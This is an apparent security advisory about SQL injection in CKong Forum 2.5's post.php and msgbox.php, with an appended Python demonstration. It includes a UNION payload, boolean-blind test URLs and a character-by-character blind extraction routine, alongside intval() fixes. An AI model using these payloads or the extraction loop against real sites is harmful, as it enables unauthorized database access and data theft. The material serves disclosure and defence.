CKong Forum v2.5 SQL injection vulnerability - Vulnerability Warning - Heiba Safety Net

2006-10-05T00:00:00
ID MYHACK58:62200612124
Type myhack58
Reporter Anonymous (佚名)
Modified 2006-10-05T00:00:00

Description

Program: CKong Forum Version: <=2.5 Type: SQL injection

Vulnerability analysis

1. post.php


<?
require_once("include/config.inc.php");
require_once('include/functions.inc.php');
$fid=intval($fid);
$tid=intval($tid);
$pid=intval($pid);

.........

if(!$C_errormsg) {
    if($postid) {
        // $postid is never passed through intval() like $fid/$tid/$pid above
        $sql='select post_content,post_date,user_name from '.TAB_POST.' where post_id='.$postid;
        $result=$db->sql_query($sql);
        $rows=$db->sql_fetchrow($result);
        // strips nested [quote]...[/quote] blocks from the quoted post; the body of the
        // regex was damaged in extraction and is reconstructed here as a plain greedy match
        $qcontent=preg_replace("/\[quote\].*\[\/quote\]/is","",$rows['post_content']);
        $qtime=date("Y-n-j G:i",$rows['post_date']);
        // the quote-box markup wrapping this string was rendered away in extraction
        $articlecontent='Quoting '.$rows['user_name'].', posted at '.$qtime.": \n".$qcontent."\n";
    }
.......


The $postid variable is not filtered: unlike $fid, $tid and $pid it is never passed through intval(), and because it is used without being read from $_GET or $_POST (register_globals) it arrives straight from the request and is concatenated into the query. The query selects three columns and the first (post_content) is echoed back inside the quoted text, so a three-column UNION is the natural test:

http://www.xxxx.cn/bbs/post.php?tid=988&postid=6157%20and%201=2%20union%20select%20user(),2,1

If the injection works, the output of user() (the database account) appears where the quoted post content would be.


2. msgbox.php

<?
.........
}elseif($action=='read') {
    // $msgid and $kind are interpolated straight into the query; only user_name comes from the session
    $sql="select msg_id from ".TAB_MSG." where user_name='".$_SESSION['username']."' and msg_id>$msgid and msg_kind='$kind' order by msg_id limit 1";
    $result=$db->sql_query($sql);
    $rows=$db->sql_fetchrow($result);
    $nextmsgid=$rows['msg_id'];
..........


The $msgid variable (and $kind alongside it) is interpolated unfiltered into the query. The user_name condition comes from $_SESSION, so a logged-in account is required, and nothing from the query is echoed directly, which makes this a boolean-based (blind) test: compare the responses for a true and a false condition:

http://www.xxxx.cn/bbs/msgbox.php?action=read&msgid=361%20and%201=1
http://www.xxxx.cn/bbs/msgbox.php?action=read&msgid=361%20and%201=2

The first request behaves exactly like a plain msgid=361 and advances to the next message; the second matches no row. Differing responses confirm the injection.


Fix

1. post.php: $postid=intval($postid);
2. msgbox.php: $msgid=intval($msgid);

intval() is only adequate for the integer parameters. $kind in msgbox.php is also interpolated unescaped (inside single quotes) and should be restricted to the expected values as well.
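As an added example (not code from CKong or from this advisory), the following Python script rebuilds both queries the way the PHP does, by string concatenation, and runs them against an in-memory SQLite table with constructed rows, so the two injections above can be reproduced offline. MySQL's user() is replaced by sqlite_version() because SQLite has no user(). It also generalises the page's 1=1 / 1=2 pair on msgbox.php into a boolean oracle that extracts a string one character at a time, and shows that the intval() fix neutralises both payloads. Table names, columns, rows and the php_intval() approximation are assumptions for the demonstration.

```python
import re
import sqlite3

# Constructed sample rows standing in for the forum's post and message tables.
# Schema and content are assumptions, not CKong's.
POSTS = [
    (6157, "hello world", 1159999000, "alice"),
    (6158, "second post", 1160000000, "bob"),
]
MSGS = [
    (360, "alice", "inbox"),
    (361, "alice", "inbox"),
    (362, "alice", "inbox"),
    (400, "bob", "inbox"),
]


def connect():
    """Fresh in-memory database loaded with the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("create table ckong_post(post_id integer, post_content text, "
               "post_date integer, user_name text)")
    db.execute("create table ckong_msg(msg_id integer, user_name text, msg_kind text)")
    db.executemany("insert into ckong_post values(?,?,?,?)", POSTS)
    db.executemany("insert into ckong_msg values(?,?,?)", MSGS)
    return db


def php_intval(s):
    """Approximation of PHP intval() on a string: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


def post_query(postid, filtered=False):
    """post.php's query built by concatenation; filtered=True applies the intval() fix."""
    if filtered:
        postid = str(php_intval(postid))
    return ("select post_content,post_date,user_name from ckong_post "
            "where post_id=" + postid)


def fetch_quoted_post(db, postid, filtered=False):
    """Row that post.php would render into the quote box (post_content first)."""
    return db.execute(post_query(postid, filtered)).fetchone()


def msg_query(msgid, username="alice", kind="inbox", filtered=False):
    """msgbox.php's query; username plays the role of $_SESSION['username']."""
    if filtered:
        msgid = str(php_intval(msgid))
    return ("select msg_id from ckong_msg where user_name='" + username +
            "' and msg_id>" + msgid + " and msg_kind='" + kind +
            "' order by msg_id limit 1")


def next_msg_id(db, msgid, filtered=False):
    """The $nextmsgid msgbox.php computes, or None when the query matches nothing."""
    row = db.execute(msg_query(msgid, filtered=filtered)).fetchone()
    return row[0] if row else None


def oracle(db, condition):
    """Boolean oracle: the page's 'and 1=1' / 'and 1=2' test with an arbitrary condition."""
    return next_msg_id(db, "361 and (" + condition + ")") is not None


def blind_extract(db, subquery, maxlen=32):
    """Recover the text result of `subquery` one character at a time through the oracle."""
    out = ""
    for pos in range(1, maxlen + 1):
        found = None
        for code in range(32, 127):  # printable ASCII
            cond = "unicode(substr((%s),%d,1))=%d" % (subquery, pos, code)
            if oracle(db, cond):
                found = chr(code)
                break
        if found is None:  # past the end of the string (substr returns '')
            break
        out += found
    return out


if __name__ == "__main__":
    db = connect()
    union = "6157 and 1=2 union select sqlite_version(),2,1"
    print("post.php injected :", fetch_quoted_post(db, union))
    print("post.php intval   :", fetch_quoted_post(db, union, filtered=True))
    print("msgbox 1=1 / 1=2  :", next_msg_id(db, "361 and 1=1"), next_msg_id(db, "361 and 1=2"))
    print("msgbox intval     :", next_msg_id(db, "361 and 1=2", filtered=True))
    print("blind extract     :", blind_extract(db, "select user_name from ckong_msg where msg_id=400"))
```

Against a real MySQL backend the same union payload would print the result of user() in the quote box, and the blind loop would use ord() in place of unicode(); the structure of the oracle does not change.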